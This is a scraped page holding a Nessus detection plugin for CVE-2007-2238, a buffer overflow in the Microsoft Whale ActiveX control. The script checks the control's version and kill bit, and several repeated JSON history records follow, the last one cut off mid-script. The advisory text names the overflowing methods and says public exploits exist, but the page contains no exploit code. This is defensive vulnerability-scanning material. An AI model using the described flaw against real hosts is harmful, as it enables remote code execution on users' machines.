Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows
2009-05-11T00:00:00
ID WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL Type nessus Reporter This script is Copyright (C) 2009-2018 Tenable Network Security, Inc. Modified 2019-11-02T00:00:00
Description
The version of the Whale Client Components ActiveX control, a component
of Microsoft Whale Intelligent Application Gateway product and installed
on the remote Windows host, reportedly contains multiple stack-based
buffer overflows that can be triggered using long arguments to the
#
# (C) Tenable Network Security, Inc.
#
include("compat.inc");
if (description)
{
script_id(38734);
script_version("1.10");
script_cvs_date("Date: 2018/08/06 14:03:16");
script_cve_id("CVE-2007-2238");
script_bugtraq_id(34532);
script_xref(name:"CERT", value:"789121");
script_xref(name:"Secunia", value:"34725");
script_name(english:"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows");
script_summary(english:"Checks version of control");
script_set_attribute(attribute:"synopsis", value:
"The remote Windows host has an ActiveX control that is affected by
multiple buffer overflows.");
script_set_attribute(attribute:"description", value:
"The version of the Whale Client Components ActiveX control, a component
of Microsoft Whale Intelligent Application Gateway product and installed
on the remote Windows host, reportedly contains multiple stack-based
buffer overflows that can be triggered using long arguments to the
'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can
trick a user on the affected host into viewing a specially crafted HTML
document, he can leverage these issues to execute arbitrary code on the
affected system subject to the user's privileges.");
script_set_attribute(attribute:"see_also", value:"http://technet.microsoft.com/en-us/library/dd282918.aspx");
script_set_attribute(attribute:"solution", value:"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:C");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:'D2ExploitPack');
script_cwe_id(119);
script_set_attribute(attribute:"plugin_publication_date", value:"2009/05/11");
script_set_attribute(attribute:"plugin_type", value:"local");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_family(english:"Windows");
script_copyright(english:"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.");
script_dependencies("smb_hotfixes.nasl");
script_require_keys("SMB/Registry/Enumerated");
script_require_ports(139, 445);
exit(0);
}
include("global_settings.inc");
include("smb_func.inc");
include("smb_activex_func.inc");
if (!get_kb_item("SMB/Registry/Enumerated")) exit(0);
# Locate the file used by the controls.
if (activex_init() != ACX_OK) exit(0);
clsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';
file = activex_get_filename(clsid:clsid);
if (file)
{
version = activex_get_fileversion(clsid:clsid);
if (version && activex_check_fileversion(clsid:clsid, fix:"3.7") == TRUE)
{
report = NULL;
if (report_paranoia > 1)
report = string(
"\n",
"Version ", version, " of the vulnerable control is installed as :\n",
"\n",
" ", file, "\n",
"\n",
"Note, though, that Nessus did not check whether the kill bit was\n",
"set for the control's CLSID because of the Report Paranoia setting\n",
"in effect when this scan was run.\n"
);
else if (activex_get_killbit(clsid:clsid) == 0)
report = string(
"\n",
"Version ", version, " of the vulnerable control is installed as :\n",
"\n",
" ", file, "\n",
"\n",
"Moreover, its kill bit is not set so it is accessible via Internet\n",
"Explorer.\n"
);
if (report)
{
if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);
else security_hole(kb_smb_transport());
}
}
}
activex_end();
{"id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "bulletinFamily": "scanner", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "description": "The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n", "published": "2009-05-11T00:00:00", "modified": "2019-11-02T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.tenable.com/plugins/nessus/38734", "reporter": "This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "cvelist": ["CVE-2007-2238"], "type": "nessus", "lastseen": "2019-11-03T12:38:43", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n", "edition": 7, "enchantments": {"dependencies": {"modified": "2019-10-28T21:42:37", "references": [{"idList": ["SSV:5070", "SSV:5062"], "type": "seebug"}, {"idList": ["KLA10392"], "type": "kaspersky"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"], "type": "metasploit"}, {"idList": ["PACKETSTORM:82980"], "type": "packetstorm"}, {"idList": ["VU:789121"], "type": "cert"}, {"idList": ["CVE-2007-2238"], "type": "cve"}, {"idList": ["EDB-ID:16608"], "type": "exploitdb"}, {"idList": ["D2SEC_MSIAG"], "type": "d2"}]}, "score": {"modified": "2019-10-28T21:42:37", "value": 7.6, "vector": "NONE"}}, "hash": "486ea293900d842e2b5ad3fe918885361de6d950883f32b895c48aeb86d584ee", "hashmap": [{"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "6d284b5ee9a2896b99ca4ed3478bd4d1", "key": "href"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "7a6f822b42e02a0c9da785674dc81360", "key": "description"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "d4cd6666f171eea3a0b59e991e7695df", "key": "reporter"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "0bafb6325bcaf483a25404f785191cc5", "key": "modified"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/nessus/38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2019-10-28T21:42:37", "modified": "2019-10-02T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 43}, "differentElements": ["modified"], "edition": 7, "lastseen": "2019-10-28T21:42:37"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:09:17", "references": [{"idList": ["SSV:5070", "SSV:5062"], "type": "seebug"}, {"idList": ["KLA10392"], "type": "kaspersky"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"], "type": "metasploit"}, {"idList": ["PACKETSTORM:82980"], "type": "packetstorm"}, {"idList": ["VU:789121"], "type": "cert"}, {"idList": ["CVE-2007-2238"], "type": "cve"}, {"idList": ["EDB-ID:16608"], "type": "exploitdb"}, {"idList": ["D2SEC_MSIAG"], "type": "d2"}]}, "score": {"value": 9.3, "vector": "NONE"}}, "hash": "cdcf45587cefc792981d76e4cfadc8336c6c4fd7529dcfefb996a809da44c95f", "hashmap": [{"hash": "50801dedadcc0c1943d34972f3bdbd78", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2019-01-16T20:09:17", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 32}, "differentElements": ["description"], "edition": 5, "lastseen": "2019-01-16T20:09:17"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component of Microsoft Whale Intelligent Application Gateway product and installed on the remote Windows host, reportedly contains multiple stack-based buffer overflows that can be triggered using long arguments to the 'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can trick a user on the affected host into viewing a specially crafted HTML document, he can leverage these issues to execute arbitrary code on the affected system subject to the user's privileges.", "edition": 4, "enchantments": {"score": {"value": 9.3, "vector": "NONE"}}, "hash": "5734d4552f61eccc66f393ab61a6db437c80b8e8090c5a6b5d9ef129c717d56a", "hashmap": [{"hash": "44a0c05534101e7e4ec146f0b881b8c9", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2018-09-01T23:49:51", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_end_attributes();\n \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2009-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Registry/Enumerated\");\n script_require_ports(139, 445);\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_activex_func.inc\");\n\n\nif (!get_kb_item(\"SMB/Registry/Enumerated\")) exit(0);\n\n\n# Locate the file used by the controls.\nif (activex_init() != ACX_OK) exit(0);\n\nclsid = '{8D9563A9-8D5F-459B-87F2-BA842255CB9A}';\nfile = activex_get_filename(clsid:clsid);\nif (file)\n{\n version = activex_get_fileversion(clsid:clsid);\n\n if (version && activex_check_fileversion(clsid:clsid, fix:\"3.7\") == TRUE)\n {\n report = NULL;\n if (report_paranoia > 1)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Note, though, that Nessus did not check whether the kill bit was\\n\",\n \"set for the control's CLSID because of the Report Paranoia setting\\n\",\n \"in effect when this scan was run.\\n\"\n );\n else if (activex_get_killbit(clsid:clsid) == 0)\n report = string(\n \"\\n\",\n \"Version \", version, \" of the vulnerable control is installed as :\\n\",\n \"\\n\",\n \" \", file, \"\\n\",\n \"\\n\",\n \"Moreover, its kill bit is not set so it is accessible via Internet\\n\",\n \"Explorer.\\n\"\n );\n if (report)\n {\n if (report_verbosity > 0) security_hole(port:kb_smb_transport(), extra:report);\n else security_hole(kb_smb_transport());\n }\n }\n}\nactivex_end();\n", "title": "Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows", "type": "nessus", "viewCount": 31}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-01T23:49:51"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2007-2238"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The version of the Whale Client Components ActiveX control, a component of Microsoft Whale Intelligent Application Gateway product and installed on the remote Windows host, reportedly contains multiple stack-based buffer overflows that can be triggered using long arguments to the 'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can trick a user on the affected host into viewing a specially crafted HTML document, he can leverage these issues to execute arbitrary code on the affected system subject to the user's privileges.", "edition": 6, "enchantments": {"dependencies": {"modified": "2019-02-21T01:11:53", "references": [{"idList": ["SSV:5070", "SSV:5062"], "type": "seebug"}, {"idList": ["KLA10392"], "type": "kaspersky"}, {"idList": ["MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES"], "type": "metasploit"}, {"idList": ["PACKETSTORM:82980"], "type": "packetstorm"}, {"idList": ["VU:789121"], "type": "cert"}, {"idList": ["CVE-2007-2238"], "type": "cve"}, {"idList": ["EDB-ID:16608"], "type": "exploitdb"}, {"idList": ["D2SEC_MSIAG"], "type": "d2"}]}, "score": {"modified": "2019-02-21T01:11:53", "value": 8.4, "vector": "NONE"}}, "hash": "5734d4552f61eccc66f393ab61a6db437c80b8e8090c5a6b5d9ef129c717d56a", "hashmap": [{"hash": "44a0c05534101e7e4ec146f0b881b8c9", "key": "description"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "aea23489ce3aa9b6406ebb28e0cda430", "key": "naslFamily"}, {"hash": "46d2f7c8cafd8aab29cadb7d894022e3", "key": "sourceData"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "06d31ea75ce174bd6e8a2331e24a21c2", "key": "modified"}, {"hash": "c07e25d141000fd1f654a48a4da4334f", "key": "published"}, {"hash": "d4c25866b8b36bc41e646cbb2f4efdd3", "key": "pluginID"}, {"hash": "7c1f8bce53687c065402b4e712a43db5", "key": "title"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "62035ad14892310feb62a59b29171a8e", "key": "references"}, {"hash": "b653856ccee7386f956205a29a7ed534", "key": "cvelist"}, {"hash": "a7fc0f0e1eb40af998b9f33578ab979c", "key": "href"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=38734", "id": "WHALE_CLIENT_ACTIVEX_3_7_SP2_OVERFLOWS.NASL", "lastseen": "2019-02-21T01:11:53", "modified": "2018-08-06T00:00:00", "naslFamily": "Windows", "objectVersion": "1.3", "pluginID": "38734", "published": "2009-05-11T00:00:00", "references": ["http://technet.microsoft.com/en-us/library/dd282918.aspx"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(38734);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2018/08/06 14:03:16\");\n\n script_cve_id(\"CVE-2007-2238\");\n script_bugtraq_id(34532);\n script_xref(name:\"CERT\", value:\"789121\");\n script_xref(name:\"Secunia\", value:\"34725\");\n\n script_name(english:\"Microsoft Whale Client Components ActiveX (WhlMgr.dll) Multiple Method Overflows\");\n script_summary(english:\"Checks version of control\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host has an ActiveX control that is affected by\nmultiple buffer overflows.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of the Whale Client Components ActiveX control, a component\nof Microsoft Whale Intelligent Application Gateway product and installed\non the remote Windows host, reportedly contains multiple stack-based\nbuffer overflows that can be triggered using long arguments to the\n'CheckForUpdates' and 'UpdateComponents' methods. If an attacker can\ntrick a user on the affected host into viewing a specially crafted HTML\ndocument, he can leverage these issues to execute arbitrary code on the\naffected system subject to the user's privileges.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://technet.microsoft.com/en-us/library/dd282918.aspx\");\n script_set_attribute(attribute:\"solution\", value:\"Upgrade to Microsoft Intelligent Application Gateway 3.7 SP2 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/05/11\");\n\n 